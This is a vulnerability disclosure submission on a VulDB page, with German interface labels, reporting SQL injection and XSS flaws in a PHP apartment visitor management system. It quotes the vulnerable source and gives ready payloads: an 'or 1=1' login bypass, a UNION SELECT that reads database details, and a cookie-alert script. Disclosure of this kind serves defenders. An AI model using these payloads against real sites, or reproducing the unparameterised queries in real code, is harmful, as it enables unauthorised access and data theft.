Submit #43328: There are SQL injection and XXS vulnerabilities in apartment management system 2.0info

TitelThere are SQL injection and XXS vulnerabilities in apartment management system 2.0
BeschreibungThere are SQL injection and XXS vulnerabilities in the apartment visitor management system. When logging in the account, the user did not check the user's input. The user can directly log in to the admin account with a universal password without entering a password, which threatens the security of the website. Vulnerability file location: / index.php look at this source code ``` if(isset($_POST['login'])){ $adminuser=$_ POST['username']; $password=md5($_POST['password']); $query=mysqli_ query($con,"SELECT ID from tbladmin where UserName='$adminuser' && Password='$password' "); ``` The username entered by the user is not checked. The input content is controlled by the user. The user directly logs in to the admin account with the universal password. statement is as follows ``` username=admin' or 1=1 --+ ``` Vulnerability file location: / action-visitor.php look at this source code ``` $eid=$_ GET['editid']; $remark=$_ POST['remark']; $query=mysqli_ query($con,"UPDATE tblvisitor set remark='$remark' where ID='$eid'"); ``` Without checking the editid input by the user, the input content is controllable by the user. The user can construct malicious statements to attack the website and illegally obtain database data. statement is as follows ``` action-visitor. php? editid=0' union select 1,database(),@@version,@@datadir,5,6,7,8,9,10,11,12--+ ``` https://s1.ax1x.com/2022/08/10/v3peFU.png Vulnerability file location: / profile.php look at this source code ``` if(isset($_POST['update'])) { $adminid=$_ SESSION['avmsaid']; $AName=$_ POST['adminname']; $mobno=$_ POST['mobilenumber']; $email=$_ POST['email']; ``` Users can construct post statement submission at will, which leads to XSS vulnerability and poses a threat to the security of the website The construction statement is as follows ``` <script>alert(document.cookie)</script> ``` https://s1.ax1x.com/2022/08/10/v8E0E9.png https://s1.ax1x.com/2022/08/10/v8EdHJ.png Source link https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code
Quelle⚠️ https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code/
Benutzer
 qidian (UID 30810)
Einreichung10.08.2022 17:10 (vor 4 Jahren)
Moderieren11.08.2022 11:16 (18 hours later)
StatusAkzeptiert
VulDB Eintrag206168 [SourceCodester Apartment Visitor Management System action-visitor.php editid/remark SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!